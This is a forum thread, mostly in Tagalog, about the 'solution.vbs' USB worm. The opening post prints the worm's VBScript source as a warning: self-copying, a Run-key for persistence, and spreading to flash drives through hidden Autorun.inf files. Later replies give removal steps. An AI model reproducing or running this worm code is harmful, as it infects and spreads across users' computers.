The Philippine Electronics and Technology Forum
February 09, 2012, 01:26:42 PM *
Welcome, Guest. Please login or register.

Login with username, password and session length
 
   Home   Help Search Login Register  

Pages: [1] 2   Go Down
  Print  
Author Topic: solution.VBS virus script  (Read 4053 times)
Siramiko
Lead Acid Battery
*******

Pogi/Ganda Points: 35
Offline Offline

Posts: 797

thank you elab


« on: June 17, 2009, 09:40:42 PM »

warning
another virus nakita nkuha sa usb flash drive
post ko dito na kung sakali mavirus kayo nito alam nyu alaing registry ang binabago ng virus
dinelete kong ang ilang code para hindi na magamit kung sakaling copyahin

On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax, pug, pou

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

If Mid(x, 4) = "solution.vbs" Then
   wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
   scrText = scrText & myFile.ReadLine & vbCrLf
Loop

ax = fso.FileExists(win & "\solution.vbs")

Set myFile = fso.CreateTextFile(win & "\solution.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(win & "\solution.vbs")
fAttr.Attributes=39

wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\solution.vbs"""



While (true)

   Set myDrives = fso.Drives
   For Each myFlashDrive In myDrives

      If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then

         If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
            Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
            fAttr.Attributes=32
            fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
         End If
     
         Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
         auFile.write "[autorun]" & vbCrLf & "open=wscript.exe solution.vbs" & vbCrLf & "shell\Open\Command=wscript.exe solution.vbs" & vbCrLf & "shell\Open\Default=1"
         auFile.close

         Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
         fAttr.Attributes=39

         Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\solution.vbs", true)
         myFile.write scrText
         myFile.close

         Set fAttr = fso.Getfile(myFlashDrive.Path & "\solution.vbs")
         fAttr.Attributes=39

      End If

   Next

   With wscr
      .RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\solution.vbs"""
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"
   End With

pug = fso.Deletefile("C:\WINDOWS\auto.vbs")


 


Wend
Logged

I shall return
The Philippine Electronics and Technology Forum
« on: June 17, 2009, 09:40:42 PM »

 Logged
7_SeVeN_7
Technical People
Solar Power Satellite
*****

Pogi/Ganda Points: 380
Offline Offline

Posts: 5954


There is no delight in owning anything unshared.


« Reply #1 on: June 17, 2009, 09:59:09 PM »

ginagawa ko dinedelete ko na lang yung file association ng VBS at VBE sa windows explorer Grin Grin Grin
Logged

E-Gizmo Mechatronix Central: www.e-gizmo.com

Tel #: (63)(2) 536-3378
Globe +63915-973-7691
Smart +63921-779-0748

Location Map

YM: julie.egizmo  aka Born2BeWired  Grin
Positron E+
Gas Turbine
**

Pogi/Ganda Points: 128
Offline Offline

Posts: 2709


You have No GOD?, You have No Peace of mind.


WWW
« Reply #2 on: June 17, 2009, 10:10:20 PM »

ginagawa ko dinedelete ko na lang yung file association ng VBS at VBE sa windows explorer Grin Grin Grin

ganun rin ginawa ko. Smiley saka para maiwan ito idelete nyo yung autorun tapos sa VIEW option ng windows explorer niyo uncheck niyo mga hide na file para makita niyo yung mga nakahide na file sa use at sa hardisk,ingat lang sa pagdelete baka madelete boot.ini at iba pang system files Smiley
Logged

Stalker, kapag nakakita ng kaunti issue tira agad, Para masaya, maligaya, kapuri-puri,kahanga-hanga,tingalain, at sambahin,gawin ang gusto para mapasaya.  Das ist es Blödsinn stalker
Woots29
Solar Power Satellite
*****

Pogi/Ganda Points: 314
Offline Offline

Gender: Male
Posts: 5322


asan si mojacko?


WWW
« Reply #3 on: June 18, 2009, 09:49:19 AM »

delete process agad ang wscript.exe

tapus delete the vbs

then check ko policy editor para sa regstry enabling

tapus hahanapin ko sa regedit ung mga keys na nabago

Logged

Dennis
Size C Battery
*****

Pogi/Ganda Points: 28
Offline Offline

Posts: 155



« Reply #4 on: June 22, 2009, 02:15:36 PM »

kapag nalagay sa registry at nakatago ang file ng virus kahit anong delete ay paulit-ulit parin yan na gagawa ng file. kasi nasa code niya yung na gumawa siya ng file. sa mga virus naman na nag-iinfect ng executable file kapag denilete mo yung main file at sa registry, kapag naipatakbo mo yung executable file na infected gagawa uli yan ng address sa registy ganun rin ng panibagong file
Logged

Failure is not defeated, Unless you stop trying

OmegaByte®, Explicitmind®, DMSoftware®
orravan
Size AAA Battery
***

Pogi/Ganda Points: 2
Offline Offline

Gender: Male
Posts: 79


"I know i'm not good yet, but soon I will"


« Reply #5 on: August 04, 2009, 02:01:14 PM »

sir techno08 mayroon na bang step by step procedure how to permanently clear the solution.vbs

pc namin sa office then pc ko sa bahay both have the same problem
end process ko sa task manager then delete all entry sa regedit.

kaso the next time na isaksak ko ulit un flash drive eh bumabalik parin...
hope to hear from you o link me to other post.

thanks
Logged
hardcore misery
Size C Battery
*****

Pogi/Ganda Points: 1
Offline Offline

Posts: 165


« Reply #6 on: August 13, 2009, 05:40:45 AM »

kailangan bang i-delete tong mga keys na to?


      .RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\solution.vbs"""
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"
Logged
Woots29
Solar Power Satellite
*****

Pogi/Ganda Points: 314
Offline Offline

Gender: Male
Posts: 5322


asan si mojacko?


WWW
« Reply #7 on: August 14, 2009, 12:00:38 PM »

yes kelangan

pero ung una lang na line
Logged

hardcore misery
Size C Battery
*****

Pogi/Ganda Points: 1
Offline Offline

Posts: 165


« Reply #8 on: August 15, 2009, 07:11:10 AM »

tinignan ko na sa registry, wala na pala sa PC ko.hehe
Logged
bluegirl
Size D Battery
******

Pogi/Ganda Points: 7
Offline Offline

Gender: Female
Posts: 273

..........me..........


WWW
« Reply #9 on: October 26, 2009, 12:55:57 AM »

na delete q yan using combo fix.. ewan q kung saan aq nakadownload nun dati.. para xang command prompt
Logged

“Mathematics is made of 50 percent formulas, 50 percent proofs, and 50 percent imagination.”
xeed
CR2032 Battery
**

Pogi/Ganda Points: 0
Offline Offline

Gender: Male
Posts: 14



WWW
« Reply #10 on: March 10, 2010, 09:27:59 PM »

i suggest to use this apps, freeware nmn xa. useful naman xa mtagal ko na xang gngmt, blocks all autorun, .vbs usb viruses, etc. here's the link:

hxxp://oldmcdonald.wordpress.com/
http://oldmcdonald.wordpress.com/
Logged

bluegirl
Size D Battery
******

Pogi/Ganda Points: 7
Offline Offline

Gender: Female
Posts: 273

..........me..........


WWW
« Reply #11 on: March 10, 2010, 11:03:51 PM »

dati combofix yung naka delete sa .vbs q na virus yung may SSG virus
Logged

“Mathematics is made of 50 percent formulas, 50 percent proofs, and 50 percent imagination.”
Karl80
CR2032 Battery
**

Pogi/Ganda Points: 1
Offline Offline

Posts: 16


« Reply #12 on: April 09, 2010, 08:28:45 PM »

haay naku lalong kumakalat at na-modify ang vbs worm kapag pino-post ang source code! hwag kayo mag-post ng source code, kung pwede lang ha.

tama ang mga post na i-kill ang wscript.exe, example sa start/run/open type nyo lang taskkill /im wcript.exe /f

Logged
theeye23
CR2032 Battery
**

Pogi/Ganda Points: 0
Offline Offline

Posts: 49


The eye is looking at you! :D


« Reply #13 on: April 09, 2010, 10:28:56 PM »

haay naku lalong kumakalat at na-modify ang vbs worm kapag pino-post ang source code! hwag kayo mag-post ng source code, kung pwede lang ha.

tama ang mga post na i-kill ang wscript.exe, example sa start/run/open type nyo lang taskkill /im wcript.exe /f

This one is good, if you suspected that you are infected with a .VBS or .JS worm, the first thing you should do is kill the WSCRIPT.EXE on process using either the Task Manager or taskkill command in Start Menu + Run. Then remove the startup entries of the worm using MSCONFIG.

But if you do not feel the manual removal then I suggest you use the Noob Killer by leerz or Ampaw Smasher X by sir t68kv to remove VBS or JS worms.
Logged

Mag-ingat sa mga asal talangka, hihilahin ka nila pababa!

Namamato pag ika'y hitik... hitik sa bunga!
de PatAtas
Diesel Generator
*

Pogi/Ganda Points: 319
Offline Offline

Gender: Male
Posts: 1267


' The unbreakable


« Reply #14 on: April 10, 2010, 11:24:19 AM »

' avenger din...pang alis ng VBS...virus
Logged

' there are many different ways to love..
jacks
Nuclear Reactor
****

Pogi/Ganda Points: 188
Offline Offline

Posts: 4267



« Reply #15 on: April 10, 2010, 12:57:15 PM »

SCBing.........
Logged
9 Volts
Size D Battery
******

Pogi/Ganda Points: 7
Offline Offline

Gender: Male
Posts: 468


Moving Target


« Reply #16 on: April 10, 2010, 02:43:40 PM »

patulong naman po sa trojan ng comp ko, di ko maalala eh, ano po magaling na pagtanggal nun,

eto na gamit ko ayaw pa rin matanggal.
kaspersky
ASO system protector
Spybot S&D
Windows def

di pa rin nila madetect.. hayz
Logged

If we hear, we forget; if we see, we remember; if we do, we understand. -- Proverb
jacks
Nuclear Reactor
****

Pogi/Ganda Points: 188
Offline Offline

Posts: 4267



« Reply #17 on: April 10, 2010, 08:07:49 PM »

Post mo symptoms nya. Ano ginagawa, pero siguro sa ibang thread na.
Logged
9 Volts
Size D Battery
******

Pogi/Ganda Points: 7
Offline Offline

Gender: Male
Posts: 468


Moving Target


« Reply #18 on: April 10, 2010, 08:43:04 PM »

Trojan-Dropper.vb.zk

yan po yung nag eexecute pag idle yung comp. ko. d ko matanggal.. panu po?

patulong mga masters..
Logged

If we hear, we forget; if we see, we remember; if we do, we understand. -- Proverb
theeye23
CR2032 Battery
**

Pogi/Ganda Points: 0
Offline Offline

Posts: 49


The eye is looking at you! :D


« Reply #19 on: April 10, 2010, 10:08:51 PM »

Trojan-Dropper.vb.zk

yan po yung nag eexecute pag idle yung comp. ko. d ko matanggal.. panu po?

patulong mga masters..
Try to scan in Safe Mode.
Logged

Mag-ingat sa mga asal talangka, hihilahin ka nila pababa!

Namamato pag ika'y hitik... hitik sa bunga!
The Philippine Electronics and Technology Forum
   

 Logged
Pages: [1] 2   Go Up
  Print  
 
Jump to:  


Related Topics
Subject Started by Replies Views Last post
Python Script Problem for Telit GM862-GPS
General Electronics and Technology Discussion
genexide 5 134 Last post March 01, 2011, 07:30:52 PM
by genexide
Powered by MySQL Powered by PHP Powered by SMF 1.1.15 | SMF © 2011, Simple Machines Valid XHTML 1.0! Valid CSS!